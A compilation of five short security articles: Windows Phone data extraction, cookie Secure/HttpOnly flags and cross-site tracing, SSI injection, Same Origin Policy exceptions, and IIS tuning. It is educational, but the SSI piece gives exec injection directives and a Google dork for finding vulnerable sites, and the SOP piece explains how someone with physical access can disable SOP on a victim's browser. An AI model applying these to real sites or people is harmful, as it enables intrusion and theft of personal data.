In fact, by continually analyzing how things are done on a Windows Phone, I found that every installed application can be easily investigated, such as Tango, Viber, or LinkedIn. Every single message, email or file sent or received is just stored in the clear; you just have to read it. This was just so intriguing to me that I decided to install the PayPal application and give it a try!

Extracting PayPal data

Once connected, the PayPal application stores everything you need to know about the PayPal account owner in one single file called "__ApplicationSettings". It can be found under "Applications\Data\75738196-1DB2-49D9-AFB1-D66A34D19FB6\Data\IsolatedStore". It's an XML file. The file contains the user's full address, email address, phone number, recent transactions, currency used, payments received and transaction history. It's really everything you need to know, all stored in the clear.

Extracting Maps data

Maps data and user location data are in general stored in the "\Application Data\Maps" folder. "MapsDataSet.dat" contains the last known locations of the phone. (In my case I found the last two addresses.) They were very accurate and given by address, not by GPS coordinates.

Summary

Analyzing a Windows Phone was very interesting, since almost every single piece of data was cached or stored in the clear; you can easily investigate Internet Explorer history, recently opened tabs, every file exchanged, every email attachment… Actually, the only challenge was getting the right level of access to the data, since Windows Phone devices give limited access rights to the user. This limitation can be bypassed by many methods already available, tested and fully working. This article was just an initial test on my own phone, and this process can be automated to get an even more in-depth analysis of any extracted file.

Downloads

Windows Phone Device Manager : TouchXperience - Mobile applications for Windows Phone & Windows Mobile
Windows Mobile Device Center : Download Microsoft Windows Mobile Device Center 6.1 for Windows Vista (32-bit) from Official Microsoft Download Center

Source
-
1. Introduction

Securing cookies is an important subject. Think about an authentication cookie: when an attacker is able to grab this cookie, he can impersonate the user. This article describes the HttpOnly and secure flags, which can enhance the security of cookies.

2. HTTP, HTTPS and the secure Flag

When the HTTP protocol is used, the traffic is sent in plaintext. This allows an attacker to see and modify the traffic (a man-in-the-middle attack). HTTPS is a secure version of HTTP; it uses SSL/TLS to protect the data of the application layer. When HTTPS is used, the following properties are achieved: authentication, data integrity and confidentiality.

How are HTTP and HTTPS related to the secure flag of a cookie? Let's consider the case of an authentication cookie. As was previously said, stealing this cookie is equivalent to impersonating the user. When HTTP is used, the cookie is sent in plaintext. This is convenient for an attacker eavesdropping on the communication channel between the browser and the server: he can grab the cookie and impersonate the user. Now let's assume that HTTPS is used instead of HTTP. HTTPS provides confidentiality, so the attacker can't see the cookie. The conclusion is to send the authentication cookie over a secure channel so that it can't be eavesdropped.

The question that might appear at this moment is: why do we need a secure flag if we can use HTTPS? Let's consider the following scenario to answer this question. The site is available over both HTTP and HTTPS, and there is an attacker in the middle of the communication channel between the browser and the server. The cookie sent over HTTPS can't be eavesdropped. However, the attacker can take advantage of the fact that the site is also available over HTTP: he can send a link to the HTTP version of the site to the user. The user clicks the link and an HTTP request is generated. Since HTTP traffic is sent in plaintext, the attacker eavesdrops on the communication channel and reads the authentication cookie of the user. Can we make this cookie be sent only over HTTPS? If this were possible, we would prevent the attacker from reading the authentication cookie in our story. It turns out that it is possible, and the secure flag is used exactly for this purpose: a cookie with the secure flag will only be sent over an HTTPS connection.

3. HttpOnly Flag

The previous section presented how to protect the cookie from an attacker eavesdropping on the communication channel between the browser and the server. However, eavesdropping is not the only attack vector for grabbing the cookie. Let's continue the story with the authentication cookie and assume that an XSS (cross-site scripting) vulnerability is present in the application. Then the attacker can take advantage of the XSS vulnerability to steal the authentication cookie. Can we somehow prevent this from happening? It turns out that the HttpOnly flag can be used to solve this problem: when the HttpOnly flag is set, JavaScript will not be able to read the authentication cookie in case of XSS exploitation. It seems like we have achieved the goal, but the problem might still be present when a cross-site tracing (XST) vulnerability exists (this vulnerability will be explained in the next section of the article): the attacker might take advantage of XSS and an enabled TRACE method to read the authentication cookie even if the HttpOnly flag is used.
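Before moving on to XST, here is a minimal sketch of what issuing a cookie with both flags looks like, using only Node's built-in http module (the cookie name and value are made up for illustration; in practice the server would of course sit behind TLS):

const http = require('http');

http.createServer((req, res) => {
  // Secure   -> the browser sends this cookie over HTTPS only.
  // HttpOnly -> document.cookie (and thus injected scripts) cannot read it.
  res.setHeader('Set-Cookie',
    'session=opaque-random-token; Secure; HttpOnly; Path=/');
  res.end('authenticated');
}).listen(8080);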
Let's see how XST works.

4. XST to bypass HttpOnly flag

GET and POST are the most commonly used HTTP methods. However, they are not the only ones. Among the others is the HTTP TRACE method, which can be used for debugging purposes. When a TRACE request is sent to the server, it is echoed back to the browser (assuming that TRACE is enabled). The important point here is that the response includes the cookies sent in the request.

Let's continue the story of the authentication cookie from the previous sections. The authentication cookie is sent in HTTP TRACE requests even if the HttpOnly flag is used. The attacker needs a way to send an HTTP TRACE request and then read the response. Here, an XSS vulnerability can be helpful. Let's assume that the application is vulnerable to XSS. Then the attacker can inject a script that sends the TRACE request. When the response comes, the script extracts the authentication cookie and sends it to the attacker. This way the attacker can grab the authentication cookie even if the HttpOnly flag is used.

As we have seen, the HTTP TRACE method was combined with XSS to read the authentication cookie, even though the HttpOnly flag was used. This combination of the HTTP TRACE method and XSS is called a cross-site tracing (XST) attack. It turns out that modern browsers block the HTTP TRACE method in XMLHttpRequest; that's why the attacker has to find another way to send an HTTP TRACE request.

One may say that XST is quite historical and not worth mentioning. In my opinion, it's good to know how XST works: if the attacker finds another way of sending HTTP TRACE, then he can bypass the HttpOnly flag. Moreover, the possibility or impossibility of sending an HTTP TRACE request is browser-dependent; it would simply be better to disable HTTP TRACE and make XST impossible. Finally, XST is a nice example that shows how an attacker might use something that is considered harmless in itself (an enabled HTTP TRACE method) to bypass the protection offered by the HttpOnly flag. It reminds us that details are very important in security, and that an attacker can connect different pieces to make an attack work.

5. Summary

The security of cookies is an important subject. The HttpOnly and secure flags can be used to make cookies more secure. When the secure flag is used, the cookie will only be sent over HTTPS, which is HTTP over SSL/TLS; in that case, an attacker eavesdropping on the communication channel between the browser and the server will not be able to read the cookie (HTTPS provides authentication, data integrity and confidentiality). When the HttpOnly flag is used, JavaScript will not be able to read the cookie in case of XSS exploitation. It was also presented how the combination of the HTTP TRACE method and XSS, known as a cross-site tracing (XST) attack, might be used to bypass the HttpOnly flag. Modern browsers block the HTTP TRACE method in XMLHttpRequest; however, it's still important to know how XST works, because if the attacker finds another way of sending HTTP TRACE, he can bypass the HttpOnly flag.

Source
-
Injection is a high-severity category of vulnerability in web applications. Attackers and security auditors alike always try to find the kinds of vulnerabilities that allow them to perform command execution. There are a number of vulnerabilities in the command-execution category, and one of them is Server Side Includes (SSI) Injection. This article is entirely about SSI Injection and is aimed at beginners.

What is Server Side Includes?

Server Side Includes is a highly useful feature for web applications. It helps you add dynamically generated content to an existing page without updating the whole page; suppose, for example, that you need to update a small part of a web page almost every minute without regenerating the entire page. This feature must be supported by the web server and enabled as well.

SSI Injection

We are going to exploit this functionality by injecting our malicious code. It is a server-side exploit because the attacker sends malicious code into a web application, which is then executed by the web server. An SSI injection attack exploits a web application to remotely execute arbitrary code. Use the directive below to check whether a site is vulnerable to SSI injection or not:

<!--#echo var="DATE_LOCAL" -->

The above directive returns the current date and time. Next, find sites which are vulnerable to SSI injection. For this, Google dorks are always a good option:

inurl:bin/cklb

Google provides a number of results (sites). Open the sites and inject into input fields such as search, login/password, etc. Please note that doing this without the permission of the website owner is totally illegal, so I am using vulnerable labs to perform this attack. Below is a picture of two input fields:

The two fields above are part of an IP-lookup feature. Normally you would enter your name and press the Lookup button; instead of a name, enter a server-side include directive, which will then be reflected in the response page. Above, I entered the "<!--#echo var="DATE_LOCAL" -->" directive in the first field to check whether the site is vulnerable to SSI injection, and in the second field I entered whatever I wished. I ran the bWAPP vulnerable web application to demonstrate this problem. As shown above, the SSI directive runs and responds with the current date and time.

For further exploitation, I show only the commands, not a proof of concept. After the above observation, the next step is to check whether command execution is possible. If you want to check the current user on the server, use <!--#exec cmd="whoami" -->. It shows the user the server is running as. The next step would be to upload a web shell. I used a Linux-based vulnerable app to perform this attack, and it is helpful for understanding this concept.

Conclusion

Nowadays every web server has a default configuration that allows SSI but not the exec feature. Upgrade the web server or make sure your server is properly configured.

References:

https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
https://www.owasp.org/index.php/Testing_for_SSI_Injection_(OWASP-DV-009)

Source
-
We all know that with JavaScript you can do many things, for example read elements on a page, analyze the DOM, etc. Now assume that you are logged into facebook.com and in another browser tab you visit mysite.com. The question is: can a script on mysite.com access the elements of the page loaded by facebook.com? The answer is a big NO. Imagine the chaos it would cause if the answer were yes! But the scripts loaded by facebook.com can happily access the page's elements. So how does the browser decide which script can access which page? This is where the Same Origin Policy comes in! SOP is one of the most important security concepts governing how modern web browsers work. This article explores SOP, including the SOP rules and some techniques to bypass SOP.

So what is Same Origin Policy?

The Same Origin Policy permits scripts running on pages originating from the 'same site' or 'same origin' to access each other's DOM with no specific restrictions, but prevents access to the DOM of pages on different sites. So how does the browser identify whether the script and the page are from the 'same origin' or not? The origin is calculated from the combination of scheme, host and port. For example, the scheme, host and port for https://www.facebook.com:8080/ are:

Scheme: https || Host: www.facebook.com || Port: 8080

Browsers consider two resources to be of the same origin if and only if all three of these values are exactly the same. For example, https://www.facebook.com:8080/ and https://www.careers.facebook.com:8080/ are not the same origin, because the host is different.

Note: the IE browser has two exceptions when checking for same origin:

IE doesn't include the port while calculating the 'origin'
The same origin policy is not applied to sites in IE's highly trusted zone.

Also note that SOP is not just limited to JavaScript. It also applies to XMLHttpRequest, cookies, Flash, etc. We will see more about this in the sections below.

Exceptions to SOP and their risks

SOP poses significant problems for large websites which use multiple domains (due to the differences in hostnames). Hence there are some exceptions which can be used to relax it.

Scripts that set domain to the same value

You can use JavaScript to set the value of the document.domain property. If two pages contain scripts which set the domain to the same value, the SOP is relaxed for these two windows, and each window can interact with the other. For example, consider the earlier scenario where a script on https://www.careers.facebook.com/ cannot access the DOM of a page loaded from https://www.facebook.com/. If this script (on https://www.careers.facebook.com/) sets its document.domain to www.facebook.com, then it can happily access the DOM. Also note that a script cannot set the value of document.domain to an arbitrary hostname; it can set the value only to a suffix of the current domain.

Risk: This is relatively safe because we are only talking about subdomains of a site. So the scope for someone exploiting this is relatively low, unless a subdomain is compromised.

CORS [Cross Origin Resource Sharing]

CORS is an HTML5 feature that allows one site to access another site's resources even if the two are on different domains. Hence, with CORS, JavaScript on a web page can initiate an AJAX request to another site, as sketched below. To allow this, a server which implements CORS adds an HTTP response header of the form 'Access-Control-Allow-Origin: www.xyz.com'. Now www.xyz.com, even though it is not of the same origin, can access this server's pages.
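As a rough illustration (the hostnames here are made up for the example), a page served from www.xyz.com could request a resource from api.abc.com like this; the browser lets the script read the response only if api.abc.com replies with a matching Access-Control-Allow-Origin header:

// Runs in a page loaded from www.xyz.com (hypothetical hosts).
fetch('https://api.abc.com/profile')
  .then((res) => res.json()) // readable only if the CORS headers permit www.xyz.com
  .then((data) => console.log(data))
  .catch((err) => console.error('blocked by SOP/CORS or network error:', err));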
Risk: Developers often tend to use '*' just to get things working. CORS, being a relatively new concept, is often misunderstood. If a site sets Access-Control-Allow-Origin: *, it means an attacker can initiate an AJAX request to the site with his JavaScript and access its resources. Hence, when security testing an HTML5 site which has CORS enabled, look at the Access-Control-Allow-Origin header to check that it permits only the intended sites.

CDM [Cross Document Messaging]

CDM, or Cross Document Messaging, is also one of the features introduced in HTML5. This feature allows documents to communicate with one another across different domains. For example, document A on www.abc.com can communicate with document X on www.xyz.com (assume it is present as an iframe) by issuing the below request from JavaScript:

// grab the embedded iframe and post a message to it,
// naming the origin we expect it to have
var c = document.getElementsByTagName('iframe')[0];
c.contentWindow.postMessage('Hiee', 'http://www.xyz.com/');

Upon receiving this request, the script on www.xyz.com can respond back using an event listener:

function receiver(event) {
  // only react to messages coming from the expected origin
  if (event.origin == 'http://www.abc.com') {
    if (event.data == 'Hiee') {
      event.source.postMessage('how are you?', event.origin);
    } else {
      alert(event.data);
    }
  }
}

Risk: If the origin checking on the receiving site is not done properly, there is a chance of running malicious code from other domains. It is also recommended to check the format of the incoming data to make sure that it is in the expected format.

JSONP

Repeating the golden rule: you cannot make a cross-domain Ajax request to update the current page. It is important to note, however, that SOP does not restrict a site from loading JavaScript files from a different domain. With JSONP, by adding a <script> element to the page, you can load a JSON response from a different domain. Because the code is loaded via the <script> tag, it can be executed normally. The below figure sums up everything!

Risk: Suppose a page hosted on abc.com uses JSONP to access services provided by xyz.com; then the site abc.com has to completely trust xyz.com. From a security perspective, excessive trust in other sites is never good. If xyz.com is malicious, it can run malicious code on the page loaded by abc.com. Also, a malicious page can request and obtain JSON data of another site by using the <script> tag, so JSONP can be used to launch CSRF attacks.

Getting Around SOP

There are ways to turn off the same origin policy in browsers. This can be exploited by attackers during targeted attacks on certain individuals. If an attacker has physical access to the target system, he can turn off SOP in that browser and then launch his attack later to steal information from the websites browsed by the user. Below are the options to turn off SOP in different browsers.

Internet Explorer:
• Go to the Security tab. For the current zone, click the 'Custom level' button.
• In the next window, look for 'Miscellaneous > Access data sources across domains' and set it to “Enable”.

Mozilla:
• Open the Mozilla browser and enter 'about:config'
• Search for security.fileuri.strict_origin_policy and change the value to false by double-clicking it, as shown below.

Google Chrome:
• Start Chrome by passing the below argument:
C:\Program Files\Chrome\Chrome.exe --disable-web-security

Safari:
• Start Safari by passing the below argument:
C:\Program Files\Safari\Safari.exe --disable-web-security

Source
-
Writing optimized website code is considered to be one of the most complicated tasks. Hence, this paper explores server-side configuration techniques and various improvements to boost your ASP.NET website's performance through the Internet Information Services (IIS) web server. Dot NET websites go live on the internet via the IIS web server and typically manipulate a huge amount of code and display a large number of images and other graphics, which obviously worsens page retrieval time from the server and degrades the overall performance of a website. So, it is important to configure some parameters of IIS so that it serves optimized web pages to users and effectively increases the overall performance of a website.

HTTP Page Headers

Every web page carries some extra information in the form of HTTP headers, which are sent with the response and inform the visitor's web browser how to handle the web page. HTTP headers can help increase the performance of a web page through HTTP Keep-Alives and Content Expiration. The HTTP Keep-Alives setting is required for connection-based authentication such as IWA (Integrated Windows Authentication); in its absence, the website becomes less responsive and slower, because the browser makes multiple connection requests in order to download an entire page containing multiple elements. The HTTP Keep-Alives setting keeps the connection open for multiple requests. On the other hand, we can noticeably reduce second-access load time through Content Expiration, which determines whether or not to return a new version of a response if the request is made after the web page content has expired. We can configure this property for every site through IIS as follows:

The HTTP header X-Powered-By: ASP.NET is not required by the browser and should be removed, because such headers are potentially exploitable and removing them slightly optimizes website bandwidth usage. Deleting this header removes unsolicited HTTP response headers from the response. Although we can delete such headers through URLRewriting and URLScan, IIS can take care of them as follows:

We can also configure this setting by changing the web.config file directly on the Visual Studio side, setting the enableVersionHeader property to false as follows:

<system.web>
<httpRuntime enableVersionHeader="false" />
</system.web>

HTTP Compression

The HTTP compression method requires support for HTTP 1.1 by the client browser. With it, a website consumes less bandwidth and pages become more responsive, because the web server compresses data before sending it and the browser decompresses the data before rendering it. This feature can be enabled in IIS through Windows Features as follows:

IIS Manager allows the DEFLATE and GNU zip (gzip) compression schemes to compress application responses, for both dynamic application responses and static files. This is beneficial in terms of increasing page responsiveness, improving bandwidth utilization and reducing server overhead. We can enable HTTP compression in the IIS web server as follows; here, we can choose the compression method along with other configuration rules, such as the cache directory and file size limit.
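A quick way to verify the effect of these header settings is to inspect the responses from outside the server. Below is a minimal sketch using Node's built-in https module (the URL is a placeholder for your own site):

const https = require('https');

https.get('https://www.example.com/',
  { headers: { 'Accept-Encoding': 'gzip, deflate' } },
  (res) => {
    // Should print "undefined" once the version header is removed:
    console.log('X-Powered-By    :', res.headers['x-powered-by']);
    // Shows whether HTTP compression kicked in for this response:
    console.log('Content-Encoding:', res.headers['content-encoding']);
    // Reflects the content-expiration settings:
    console.log('Cache-Control   :', res.headers['cache-control']);
    console.log('Expires         :', res.headers['expires']);
    res.resume(); // discard the body; only the headers matter here
  }
).on('error', console.error);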
Output Caching

Output caching makes web pages tremendously more responsive during round trips to the server. When a user requests a particular page, the web server returns it to the client browser and stores a copy of that processed web page in memory on the web server, returning the copy to the client in subsequent requests for the same content, which eliminates the need to reprocess that page in the future. The cached contents are discarded if resources run low on the web server; the page will then be re-processed and re-cached at the time of the next request for that content. We can configure the cache size limit and maximum cached response size through IIS Manager, as shown in the image above.

Website Connection

It is commonly observed that users open a website, perform no further activity, and keep it open for an indefinite time, which consumes web server resources because IIS spends computing resources keeping the connection alive. It is recommended to set a connection time-out and keep it as low as possible, in order to save computing resources and achieve better performance. We can set the connection time-out for a website through IIS Manager as follows:

ASP.NET Debugging

A website typically runs in debugging mode while in development, in order to do proper testing of business logic and other diagnostics; but unfortunately, if the programmer forgets to turn this configuration off during deployment to the production server, it consumes abundant processing power and eventually degrades performance. Debugging is disabled by default and is typically enabled only to troubleshoot a problem. ASP.NET applications compiled in debugging mode carry extra information that enables a debugger to closely regulate and supervise the execution of a website; however, the performance of the application is affected. Deploying a website with debug mode enabled is dangerous and considered a serious vulnerability, because hackers can obtain inside information about the application that they should never have access to. We can configure this setting via IIS Manager as follows:

We can also alter this setting from the web.config file by setting the debug attribute to false as follows:

<system.web>
<compilation debug="false" explicit="true" strict="false" targetFramework="4.0" />
</system.web>

Bandwidth Adjusting

Bandwidth must be managed properly for a website: allotting too little bandwidth to a website that requires more, or letting one website consume so much bandwidth that others are left with too little, would both definitely affect website performance. We can limit the total bandwidth for a website through IIS Manager; this limit is disabled by default, which is indeed the recommended setting.

Application Pool Limits

A website can be divided into groups of one or more URLs that are served by a worker process. These pools create complete sandbox isolation from the other application pools, offering security and performance benefits: applications in one pool cannot affect the applications in another pool. Each application pool runs its own worker process within the operating system, so there is complete isolation between pools. The w3wp.exe worker process runs in user mode and processes requests, such as dynamic or static content, for each application pool. Here, we can configure the application pool for a web server as follows:

When an application pool is recycled, the existing worker process is not immediately killed; instead, a second process is started, and once it is ready, Http.sys will send all new requests to the new worker process.
Once the old worker process has finished handling all of its requests, it will shut down. We can stop this overlap from happening by setting Disable Overlapped Recycle to true; the existing process will then shut down first, and only then will a new one be started. We can make this configuration change from Advanced Settings as follows:

Unoccupied Modules

Websites deployed in IIS are typically loaded with some built-in modules, such as Profile and Passport authentication, which load on each round trip to the server. Some of them are associated with that particular website in order to enable corresponding functionality, but the rest are useless and create extra CPU overhead, because they too are loaded with each page request to the server. We can look at all of the built-in modules through IIS Manager:

We can either remove unused modules via IIS Manager, as illustrated in the figure above, or through the web.config file in the project solution as follows:

<system.webServer>
<modules>
<remove name="Profile" />
</modules>
</system.webServer>

Summary

Although performance issues in websites are deemed to be complicated, and programmers have been striving to achieve fast, responsive websites by employing sophisticated algorithms, here we achieved this not by writing code, but by making some configurations in the IIS web server. We have come to an understanding of the performance internals of an ASP.NET website; in fact, we have touched the most crucial segment, the one responsible for making a website good or bad in terms of performance. This article illustrated various IIS configurations for ASP.NET websites, in order to make them faster and more responsive.

Source